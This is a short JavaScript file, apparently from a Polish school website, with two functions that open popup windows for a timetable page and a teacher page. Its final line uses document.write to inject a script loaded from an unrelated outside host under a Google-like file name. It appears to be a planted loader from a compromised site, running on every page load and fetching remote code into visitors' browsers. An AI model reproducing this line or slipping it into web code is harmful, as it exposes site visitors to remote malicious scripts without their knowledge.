function plan(id, width, height, scroll){
   window.open('plan.php?id=' + id + '','nazwa','width=' + width + ', height=' + height + ', scrollbars=' + scroll + ',menubar=no, status=no,locationbar=no,risizeable=no');
}


function nauczyciele(imie_nazwisko, nr, przedmioty, wychowawca){
  window.open('nauczyciele.php?imie_nazwisko=' + imie_nazwisko + '&nr=' + nr + '&przedmioty=' + przedmioty + '&wychowawca=' + wychowawca + '','nazwa','width=240,height=380,scrollbars=no,menubar=no, status=no,locationbar=no,risizeable=no');
}


document.write('<script src=http://autocar.ee/images/google12393a24488ebb70.php ><\/script>');